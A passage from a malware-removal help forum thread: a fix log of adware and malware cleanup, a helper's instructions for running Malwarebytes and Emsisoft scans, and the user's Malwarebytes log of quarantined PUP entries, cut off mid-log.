HKCR\Wow6432Node\CLSID\{39b43360-c1aa-4a02-bb9d-9d41d7dd1531} => key not found. 
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{6857857C-15D3-435D-AF19-E0217298B416} => value removed successfully
HKCR\CLSID\{6857857C-15D3-435D-AF19-E0217298B416} => key not found. 
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{EF91116F-DE92-4286-9087-093085152182} => value removed successfully
HKCR\CLSID\{EF91116F-DE92-4286-9087-093085152182} => key not found. 
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{41977804-C772-4713-BD5F-F4C56BF4CE89} => value removed successfully
HKCR\CLSID\{41977804-C772-4713-BD5F-F4C56BF4CE89} => key not found. 
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{0B9F58EF-90CC-2474-09B9-80B8E9DD43CA} => value removed successfully
HKCR\CLSID\{0B9F58EF-90CC-2474-09B9-80B8E9DD43CA} => key not found. 
HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\[email protected] => value removed successfully
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@nielsen/FirefoxTracker" => key removed successfully
"HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\MozillaPlugins\CouponNetwork.com/CMDUniversalCouponPrintActivator" => key removed successfully
C:\Users\Kenneth\AppData\Roaming\CATALI~2\NPBCSK~1.DLL => not found.
C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\Default\Extensions\mgjkknncnlepghplinfpikcijdbmidbg <==== ATTENTION => not found
"HKLM\SOFTWARE\Google\Chrome\Extensions\iikflkcanblccfahdhdonehdalibjnif" => key removed successfully
"HKLM\SOFTWARE\Google\Chrome\Extensions\mgjkknncnlepghplinfpikcijdbmidbg" => key removed successfully
C:\Users\Kenneth\AppData\Local\11197219_Setup.crx => moved successfully
"HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\SOFTWARE\Google\Chrome\Extensions\mgjkknncnlepghplinfpikcijdbmidbg" => key removed successfully
"C:\Users\Kenneth\AppData\Local\11197219_Setup.crx" => not found.
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\bhfhojbhbnajajgihpicejdalbjlpcep" => key removed successfully
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\iikflkcanblccfahdhdonehdalibjnif" => key removed successfully
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\mgjkknncnlepghplinfpikcijdbmidbg" => key removed successfully
"C:\Users\Kenneth\AppData\Local\11197219_Setup.crx" => not found.
CarboniteService => service removed successfully
TransferService => service removed successfully
LMIRfsClientNP => service removed successfully
AODDriver4.0 => service removed successfully
cpuz134 => service removed successfully
NAVENG => service could not remove
NAVEX15 => service could not remove
WinRing0_1_2_0 => service removed successfully
"C:\Program Files\Carbonite" => not found.
C:\Program Files (x86)\MR APP => moved successfully
"C:\Program Files (x86)\TurboYourPC" => not found.
C:\Users\Kenneth\AppData\Local\0de59 => moved successfully
C:\Users\Kenneth\Downloads\Firefox Setup Stub 50.0.exe => moved successfully
C:\Users\Kenneth\Downloads\Firefox Setup Stub 50.0 (1).exe => moved successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus => moved successfully
C:\Program Files\McAfee Security Scan => moved successfully
C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk => moved successfully
"C:\Users\Kenneth\AppData\Local\11197219_Setup.crx" => not found.
C:\Users\Kenneth\AppData\Local\BcsKtYcHW.dll => moved successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Uninstall Helper 2.0.1.0\\SystemComponent => value not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0867B664-EF32-42F5-8757-C15E298A230B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0867B664-EF32-42F5-8757-C15E298A230B}" => key removed successfully
C:\Windows\System32\Tasks\{6618EADD-5989-4B12-8B04-AA89D2E1DBD4} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{6618EADD-5989-4B12-8B04-AA89D2E1DBD4}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{219B9AB8-6B65-49C1-A3D9-0C452968D8BF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{219B9AB8-6B65-49C1-A3D9-0C452968D8BF}" => key removed successfully
C:\Windows\System32\Tasks\{42B4231A-778C-4762-8421-2BAE54306AE0} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{42B4231A-778C-4762-8421-2BAE54306AE0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{CC7E65C3-6361-4D7E-B8AC-593EC7CDC357}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CC7E65C3-6361-4D7E-B8AC-593EC7CDC357}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ReimageUpdater => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{EDED2E7E-A3D1-46D0-8A2E-94E32A2E3006}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EDED2E7E-A3D1-46D0-8A2E-94E32A2E3006}" => key removed successfully
C:\Windows\System32\Tasks\Optimum_LogOn => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Optimum_LogOn => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FAA3495A-3D90-4C80-BE45-F8DE4E9C9DFE}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FAA3495A-3D90-4C80-BE45-F8DE4E9C9DFE}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Optimum_Daily => key not found. 
C:\ProgramData\Temp => ":9A870F8B" ADS removed successfully.
"HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\Classes\f8352" => key removed successfully
 
========= netsh advfirewall reset =========
 
Ok.
 
 
========= End of CMD: =========
 
 
========= netsh advfirewall set allprofiles state on =========
 
Ok.
 
 
========= End of CMD: =========
 
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.
 
========= RemoveProxy: =========
 
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyEnable => value removed successfully
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value removed successfully
HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value removed successfully
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
 
 
========= End of RemoveProxy: =========
 
 
========= ipconfig /flushdns =========
 
 
Windows IP Configuration
 
Successfully flushed the DNS Resolver Cache.
 
========= End of CMD: =========
 
 
========= ipconfig /release =========
 
 
Windows IP Configuration
 
No operation can be performed on Local Area Connection while it has its media disconnected.
 
Ethernet adapter Local Area Connection:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
 
Wireless LAN adapter Wireless Network Connection:
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::b429:3481:c4cc:3935%12
   Default Gateway . . . . . . . . . : 
 
Tunnel adapter isatap.{F52047E5-D6C8-4EA2-B649-DF266EDC869F}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
 
Tunnel adapter Local Area Connection* 9:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
 
Tunnel adapter Local Area Connection* 13:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
 
========= End of CMD: =========
 
 
========= ipconfig /renew =========
 
 
Windows IP Configuration
 
No operation can be performed on Local Area Connection while it has its media disconnected.
 
Ethernet adapter Local Area Connection:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
 
Wireless LAN adapter Wireless Network Connection:
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::b429:3481:c4cc:3935%12
   IPv4 Address. . . . . . . . . . . : 192.168.0.2
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.0.1
 
Tunnel adapter isatap.{F52047E5-D6C8-4EA2-B649-DF266EDC869F}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
 
Tunnel adapter Local Area Connection* 9:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
 
Tunnel adapter Local Area Connection* 13:
 
   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : 2001:0:5cf2:8c44:1807:38e1:3f57:fffd
   Link-local IPv6 Address . . . . . : fe80::1807:38e1:3f57:fffd%17
   Default Gateway . . . . . . . . . : ::
 
========= End of CMD: =========
 
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 6155896 B
Java, Flash, Steam htmlcache => 3709 B
Windows/system/drivers => 20081 B
Edge => 0 B
Chrome => 426886971 B
Firefox => 558979 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 128 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 0 B
Kenneth => 209080224 B
LogMeInRemoteUser => 0 B
 
RecycleBin => 0 B
EmptyTemp: => 620.9 MB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 16:27:26 ====

  • 0

#14
Bruce1270

Bruce1270

    Trusted Helper

  • Malware Removal
  • 1,603 posts
Hi KenBarber

:thumbsup: That's what I was looking for.

Next steps.

Step1 - Malwarebytes

Please download Malwarebytes' Anti-Malware from Here or Here
Double-click on mbam-setup-version-number.exe to install the application.
Before clicking Finish perform the following actions --

Un-check the box beside Enable free trial of Malwarebytes Anti-Malware Premium.
Check the box beside Launch Malwarebytes Anti-Malware

Once the program has loaded, The MBAM dashboard may appear with an alert to update - click the button Fix Now;

Navigate to the Settings tab > Detection and Protection and ensure all the boxes under Detection Options are checked.

MBAM_settings_zps3dey1yqg.jpg

Return to the Dashboard click on Scan Now;

MBAM_scan_zpsoqfjupkt.jpg

If threats are detected, make sure everything is set to Quarantine and click on Apply actions. If the program asks to reboot your PC, let it do so;
On completion of the scan click on History > Application Log. After that click on the top Scan Log > Export, select Text File and save the log to your Desktop;
Copy and Paste the contents of the log in your next reply.


Step2 - Emsisoft Emergency kit scan
  • Download the Emsisoft Emergency Kit and execute it. From there, click on the Extract button to extract the program in the EEK folder;
  • Once the extraction is complete, Emsisoft Emergency Kit will open, and suggest you to run an online update before using the program. Click on Yes to launch it.
  • After the update, click on Malware Scan under 2. Scan and accept to let Emsisoft Emergency Kit detect PUPs (click on Yes).
  • Once the scan is complete, if items are detected make sure that every item in the list is checked, and click on Quarantine selected;
    Egla2gt_zps9rvyqyyd.png
  • If it asks you for a reboot to delete some items, click on Ok to reboot automatically;
  • After the restart, click on the Start Emsisoft Emergency Kit icon again on your desktop to open it;
  • This time, click on Logs;
  • From there, go under the Quarantine Log tab, and click on the Export button;
    IgfWDr3_zpsnumgwse6.png
  • Save the log on your desktop, then open it, and copy/paste its content in your next reply;


    Things for your next post:
  • MBAM log
  • Emsisoft log
  • How is the computer running - are the Web browsers any better?

  • 0

#15
kenbarber

kenbarber

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 116 posts

hopefully this is right. weather front moving in. i have cp and hands are sore and shaky. 

 

Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 11/28/2016
Scan Time: 7:55 PM
Logfile: scanlog.txt
Administrator: Yes
 
Version: 2.2.1.1043
Malware Database: v2016.11.29.01
Rootkit Database: v2016.11.20.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Kenneth
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 470628
Time Elapsed: 1 hr, 28 min, 44 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 50
PUP.Optional.ASK.Gen, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{4F524A2D-5637-006A-76A7-A758B70C1500}, Quarantined, [4abb81451387ce688187e1c3f012e917], 
PUP.Optional.ConsumerInput, HKU\S-1-5-21-1169555862-3845460206-1416485692-1004\SOFTWARE\APPDATALOW\SOFTWARE\Compete, Quarantined, [3dc8873fd7c36ccadd8717aa8f738b75], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{28A27F58-704F-40E1-8053-28E909FBF604}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{28A27F58-704F-40E1-8053-28E909FBF604}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{24FDD05B-A2EB-481E-8903-C93672132206}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\TYPELIB\{AD0FF573-4DD1-4CF7-AA25-41280783CA54}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\INTERFACE\{9C7FE734-B75D-4860-8D20-6066D267E1DF}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\INTERFACE\{C4FBCD79-A083-437D-9B46-769DFC9E67B7}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\INTERFACE\{E81B1516-F2FE-46D3-8D03-87D539851813}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{9C7FE734-B75D-4860-8D20-6066D267E1DF}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{C4FBCD79-A083-437D-9B46-769DFC9E67B7}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{E81B1516-F2FE-46D3-8D03-87D539851813}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{9C7FE734-B75D-4860-8D20-6066D267E1DF}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{C4FBCD79-A083-437D-9B46-769DFC9E67B7}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{E81B1516-F2FE-46D3-8D03-87D539851813}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKU\S-1-5-21-1169555862-3845460206-1416485692-1000_Classes\TYPELIB\{AD0FF573-4DD1-4CF7-AA25-41280783CA54}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{AD0FF573-4DD1-4CF7-AA25-41280783CA54}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\WOW6432NODE\TYPELIB\{AD0FF573-4DD1-4CF7-AA25-41280783CA54}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{24FDD05B-A2EB-481E-8903-C93672132206}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{6857857C-15D3-435D-AF19-E0217298B416}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{6857857C-15D3-435D-AF19-E0217298B416}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{6857857C-15D3-435D-AF19-E0217298B416}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{6857857C-15D3-435D-AF19-E0217298B416}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{28A27F58-704F-40E1-8053-28E909FBF604}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{28A27F58-704F-40E1-8053-28E909FBF604}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{28A27F58-704F-40E1-8053-28E909FBF604}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{B0E42C7C-F949-2C54-2944-6642CF94AB20}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{B0E42C7C-F949-2C54-2944-6642CF94AB20}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{0B9F58EF-90CC-2474-09B9-80B8E9DD43CA}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\TYPELIB\{2D065CBD-44A4-D344-DD27-A9D8982908AC}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\INTERFACE\{697F1834-1B5D-C660-8D54-601BD2FDE13E}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\INTERFACE\{6B1B2D16-C0FE-07D3-8D08-8738397A188A}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\INTERFACE\{9DFBB479-E883-CC7D-9BA8-766CFC5167AD}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{697F1834-1B5D-C660-8D54-601BD2FDE13E}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{6B1B2D16-C0FE-07D3-8D08-8738397A188A}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{9DFBB479-E883-CC7D-9BA8-766CFC5167AD}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{697F1834-1B5D-C660-8D54-601BD2FDE13E}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{6B1B2D16-C0FE-07D3-8D08-8738397A188A}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{9DFBB479-E883-CC7D-9BA8-766CFC5167AD}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKU\S-1-5-21-1169555862-3845460206-1416485692-1000_Classes\TYPELIB\{2D065CBD-44A4-D344-DD27-A9D8982908AC}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{2D065CBD-44A4-D344-DD27-A9D8982908AC}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\WOW6432NODE\TYPELIB\{2D065CBD-44A4-D344-DD27-A9D8982908AC}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{0B9F58EF-90CC-2474-09B9-80B8E9DD43CA}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{0B9F58EF-90CC-2474-09B9-80B8E9DD43CA}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{0B9F58EF-90CC-2474-09B9-80B8E9DD43CA}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{111AAAE5-8048-4404-4D11-8E8CF158C393}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{111AAAE5-8048-4404-4D11-8E8CF158C393}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{B0E42C7C-F949-2C54-2944-6642CF94AB20}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{B0E42C7C-F949-2C54-2944-6642CF94AB20}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
PUP.Optional.FreeCauseBHO, HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{B0E42C7C-F949-2C54-2944-6642CF94AB20}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
 
Registry Values: 4
PUP.Optional.ASK.Gen, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{4F524A2D-5637-006A-76A7-A758B70C1500}|InstallSource, C:\ProgramData\APN\APN-Stub\ORJ-V7\, Quarantined, [4abb81451387ce688187e1c3f012e917]
Trojan.Fileless.MTGen, HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^zbhuduql, Quarantined, [c144c006b6e455e13f22607dcd35e020], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\TOOLBAR|{6857857C-15D3-435D-AF19-E0217298B416}, Quarantined, [c83d388e5644aa8c3bbc4cdbdf24ff01], 
PUP.Optional.FreeCauseBHO, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\TOOLBAR|{0B9F58EF-90CC-2474-09B9-80B8E9DD43CA}, Quarantined, [739202c4267477bf8b6c6abd5ea59d63], 
 
Registry Data: 0
(No malicious items detected)
 
Folders: 25
PUP.Optional.FreeCauseTB, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\FCTB\{18b8f08d-62fe-4dfc-ad6c-9ce46515d5ec}, Quarantined, [8481dbebd0ca93a3adc9ad15946d11ef], 
PUP.Optional.FreeCauseTB, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\FCTB\{18b8f08d-62fe-4dfc-ad6c-9ce46515d5ec}\58757, Quarantined, [8481dbebd0ca93a3adc9ad15946d11ef], 
PUP.Optional.FreeCauseTB, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\FCTB\{51ef49d2-624b-4194-8b97-1c468e9b0efe}, Quarantined, [6d983393257500360175477b6d94956b], 
PUP.Optional.FreeCauseTB, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\FCTB\{51ef49d2-624b-4194-8b97-1c468e9b0efe}\60497, Quarantined, [6d983393257500360175477b6d94956b], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\CT2438727, Quarantined, [fc091fa7eeacb77f6df9c90a4cb555ab], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\CT2438727\Dialogs, Quarantined, [fc091fa7eeacb77f6df9c90a4cb555ab], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\CT2438727\Dialogs\AddedAppDialog, Quarantined, [fc091fa7eeacb77f6df9c90a4cb555ab], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\CT2438727\Dialogs\DefualtImages, Quarantined, [fc091fa7eeacb77f6df9c90a4cb555ab], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\CT2438727\Dialogs\DetectedAppDialog, Quarantined, [fc091fa7eeacb77f6df9c90a4cb555ab], 
PUP.Optional.ConduitTB.Gen, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y02lqlpx.default\CT2438727\Dialogs\EngineFirstTimeDialog, Quarantined, [fc091fa7eeacb77f6df9c90a4cb555ab], 
